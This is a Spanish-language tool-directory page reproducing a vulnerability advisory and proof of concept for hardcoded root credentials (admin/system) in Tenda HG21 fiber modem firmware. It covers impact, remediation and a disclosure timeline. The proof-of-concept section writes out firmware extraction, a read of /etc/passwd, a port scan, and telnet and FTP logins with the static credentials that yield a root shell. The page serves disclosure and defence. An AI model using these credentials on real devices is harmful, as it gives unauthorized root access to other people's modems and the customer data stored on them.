Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-38577-by-deepak-Anmol — Prueba de concepto que demuestra credenciales raíz codificadas (admin/system) en el firmware del módem XPON Tenda HG21, lo que permite acceso raíz no autorizado mediante telnet y FTP. | Kitploit
Herramientas/GitHubGitHub/poxsky/cve-2026-38577-by-deepak-anmol
Seguridad de Sistemas EmbebidosSeguridad IoTAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónSeguridad de Hardware e IoTAnálisis de Firmware
GitHubpoxsky/cve-2026-38577-by-deepak-anmol

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-38577-by-deepak-Anmol

Prueba de concepto que demuestra credenciales raíz codificadas (admin/system) en el firmware del módem XPON Tenda HG21, lo que permite acceso raíz no autorizado mediante telnet y FTP.

Ver Repositorio
hace 9h 27mAún no revisado

CVE-2026-38577 — Credenciales raíz codificadas en Tenda HG21

Resumen

CampoValor
ID CVECVE-2026-38577
FabricanteTenda
ProductoTenda HG21 (Módem de fibra XPON)
Versión afectadaV4.0.0-260302
Clave de productoHG21-V1.0-TDE01
Versión de hardwareV1.0
Fecha de compilación del firmware2026-03-02
Archivo de firmwareUS_HG21re_300002982_en_xpon_2.zip
Clase de vulnerabilidadCWE-798: Uso de credenciales codificadas
DescubridorAnmol Singh Rajput — Investigador de seguridad independiente
Estado de divulgaciónFabricante aún no notificado en el momento de la reserva del CVE — se aplica un plazo de divulgación responsable de 90 días desde la fecha de asignación del CVE

Descripción

El análisis del firmware del módem de fibra XPON Tenda HG21 reveló una cuenta administrativa codificada integrada en la imagen de firmware distribuida. A la cuenta se le conceden privilegios completos de root (UID 0) y sus credenciales son estáticas en todos los dispositivos, lo que significa que cualquier atacante que pueda acceder a un servicio de administración expuesto en una unidad vulnerable puede autenticarse como root sin necesidad de conocer la contraseña de la interfaz web establecida por el cliente.

Dónde se encontró

  • /etc/passwd en el firmware extraído incluye una entrada admin con un hash de contraseña SHA256crypt que se resuelve al valor estático system.
  • El UID de la cuenta es 0 — es decir, es root, no una cuenta de servicio restringida.
  • No hay /etc/shadow, por lo que el hash débil/estático en passwd es la única barrera que protege la cuenta.
  • /etc/inetd.conf inicia telnetd y ftpd, ambos ejecutados como root, por lo que la cuenta codificada es accesible a través de la red, no solo desde una consola serie/UART.
  • La interfaz de administración web se sirve únicamente mediante HTTP sin cifrar (sin TLS), lo que constituye una brecha de endurecimiento secundaria, pero no es en sí misma el CVE.

Impacto

Un atacante con acceso de red al servicio telnet (TCP/23) o FTP (TCP/21) de un dispositivo vulnerable puede iniciar sesión como admin usando la contraseña estática y obtener un shell root / acceso a archivos a nivel de root. Esto permite, como mínimo:

  • Ejecución de código — shell root mediante telnet.
  • Escalada de privilegios — no existe límite de privilegios; la cuenta comienza como root.
  • Divulgación de información — acceso completo al sistema de archivos/ configuración, incluidas las credenciales de red del cliente almacenadas en el dispositivo.

Vectores CVSS del envío original (la puntuación del fabricante puede diferir una vez publicada):

  • Vector de ataque: Red
  • Privilegios requeridos: Ninguno (las credenciales están codificadas/son conocidas)
  • Interacción del usuario: Ninguna
  • Confidencialidad / Integridad / Disponibilidad: Alta / Alta / Alta

Prueba de concepto

Esta es una PoC basada en credenciales — demuestra que la cuenta codificada autentica y otorga root, no es un exploit de corrupción de memoria. Ejecútela únicamente contra un dispositivo que le pertenezca o para el que tenga autorización explícita de prueba.

1. Confirmar que la credencial existe en el firmware

root@kitploit:~
# Extraer el firmware (binwalk o la herramienta del fabricante que prefiera)
binwalk -e US_HG21re_300002982_en_xpon_2.bin

# Localizar e inspeccionar el archivo passwd
find . -name passwd
cat squashfs-root/etc/passwd
# -> admin:<sha256crypt-hash-of-"system">:0:0:root:/root:/bin/sh

2. Confirmar que el servicio es accesible

root@kitploit:~
nmap -p 21,23 <target-ip>

3. Autenticarse con la cuenta codificada

root@kitploit:~
telnet <target-ip>
# login: admin
# password: system
root@kitploit:~
ftp <target-ip>
# Name: admin
# Password: system

Un inicio de sesión exitoso en cualquiera de los dos servicios devuelve un shell/sesión FTP con privilegios de root (id reportará uid=0(root)).

Remediación

  • El fabricante debe eliminar por completo la cuenta codificada admin/system, o como mínimo forzar una contraseña aleatoria única por dispositivo establecida en el primer arranque (no derivable únicamente del número de serie).
  • Deshabilitar telnetd/ftpd por defecto; exigir una activación explícita y un canal autenticado y cifrado (SSH/SFTP) para la administración remota.
  • Servir la interfaz de administración únicamente mediante HTTPS.
  • Rotar la credencial estática en cualquier unidad ya desplegada mediante una actualización de firmware obligatoria y forzar un restablecimiento de contraseña en la actualización.

Cronología

FechaEvento
2026-03-02Versión vulnerable del firmware publicada
—Descubierta durante un análisis independiente del firmware
2026-04-09CVE-2026-38577 reservado mediante MITRE
—Notificación al fabricante pendiente (ventana de divulgación de 90 días desde la asignación del CVE)

Créditos

Descubierto y reportado por:

  • Anmol Singh Rajput — LinkedIn
  • Deepak G — LinkedIn

Referencias

  • https://www.tenda.com.cn
  • https://cwe.mitre.org/data/definitions/798.html
Descargar herramienta